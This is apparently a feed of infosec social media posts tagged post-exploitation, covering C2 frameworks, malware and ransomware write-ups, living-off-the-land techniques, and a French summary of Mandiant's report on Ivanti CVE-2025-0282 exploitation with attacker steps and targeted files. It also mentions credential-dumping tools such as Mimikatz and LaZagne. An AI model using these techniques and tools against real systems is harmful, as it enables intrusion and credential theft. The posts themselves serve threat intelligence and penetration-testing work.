If the Kardashians launched their own framework it would be Kommand and Kontrol (K2).
The Momager (Kris.exe or Kris.sh): The primary C2 listener.
The Glow Up: Privesc
Keeping Up: Lateral movement
#C2Framework #RedTeaming #PostExploitation #MalwareDevelopment #Infosec #CyberSecurity #EDRBypass #ActiveDirectory #PenTesting #ThreatHunting #MITREATTACK #APTHunting #Shellcode #ZeroDay #Persistence #Exfiltration #BlueTeam #PurpleTeaming #kardashians
 Introducing KeyChecker – a CLI to fingerprint SSH private keys & map them to Git hosting accounts.
We have been talking about this in our classes for a long while, finally automation is present now.
 Blog: https://cyfinoid.com/automating-a-known-weakness-introducing-keychecker/
 PyPI: https://pypi.org/project/keychecker/
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sample
TL;DR for blue teamers:
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
Skitnet is shaking up the cybercrime scene—this stealthy ransomware tool is now powering high-stakes attacks by notorious groups. Ever wonder how hackers pull off such seamless heists? Dive into the story behind the tool that's rewriting the rules.
https://thedefendopsdiaries.com/skitnet-a-new-era-in-ransomware-tools/
#skitnet
#ransomware
#cybersecurity
#postexploitation
#blackbasta
Skitnet is shaking up the ransomware scene with stealthy tactics and jaw-dropping capabilities—already in use by notorious gangs. What does this mean for our digital defenses? Dive into the details.
https://thedefendopsdiaries.com/skitnet-a-new-era-in-ransomware-tools/
#skitnet
#ransomware
#cybersecurity
#postexploitation
#blackbasta
They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitch
http://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/
⚠️ Nouvelle vulnérabilité Zero-Day ciblant les VPN Ivanti Connect Secure (CVE-2025-0282)
#Mandiant a publié les premiers signes d'exploitation (avec une première attribution à UNC5337) :
🔍 Étapes courantes identifiées lors de l'exploitation :
1️⃣ Désactive SELinux
2️⃣ Bloque le transfert des journaux syslog
3️⃣ Re-monte le disque en lecture-écriture
4️⃣ Écrit un script malveillant
5️⃣ Exécuter ce script
6️⃣ Déploie un ou plusieurs web shells
7️⃣ Modifie les journaux pour cacher l'activité
8️⃣ Réactive SELinux
9️⃣ Re-monte le disque
🛑 Techniques de dissimulation post-exploitation :
💡 Observations supplémentaires :
CVE-2025-0282 affecte plusieurs niveaux de patch d’ICS release 22.7R2.
Exploitation réussie dépendante de la version spécifique.
Des requêtes répétées au VPN sont observées avant exploitation, probablement pour identifier la version.
🗂️ Fichiers ciblés :
/dana-cached/hc/hc_launcher.22.7.2.2615.jar
/dana-cached/hc/hc_launcher.22.7.2.3191.jar
/dana-cached/hc/hc_launcher.22.7.2.3221.jar
/dana-cached/hc/hc_launcher.22.7.2.3431.jar
⚠️Mandiant informe avoir observé des signes d'exploitation active en nature depuis mi-décembre 2024.
"Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation"
👇
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day/?hl=en
#CyberVeille #Ivanti #IoC #postexploitation
#attribution
#CVE_2025_0282 #CVE_2025_0283
Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.
And don’t fret if you missed the initial livestream – you can watch the recording on demand! https://bfx.social/3K4T1mS
P.S. Episode 3 is on the way!
How common is it for a PHP install to support curl_* functions or at least not have them filtered?
#pentesting #postexploitation #php
Check out this list of #postexploitation tools we enjoy using in our #pentesting work, such as:
- Mimikatz
- PowerHub
- Bashark
- And Metasploit of course!
See the full list: https://bishopfox.com/blog/post-exploitation-tools-for-pen-test
During post-exploitation, how do you prefer to name/identify the systems?
#postexploitation #pentesting
Other than MITRE ATT&CK which is very broad and exhaustive, is there a attribute list for "capabilities" or "functionality" (or whatever you want to call them) that exploits or payloads grant the user? I'm looking for things like command-exec, file-read, file-write, etc.
#infosec #taxonomy #postexploitation #mitreattck
Find out what passwords are stored and where on your PC with LaZagne:
https://github.com/AlessandroZ/LaZagne
#opensource #postexploitation
"Ok, I just became domain admin..... so..... what now??"
#pentest #whitehathacking #postexploitation #activedirectory #domainadmin #postpostexploitstion
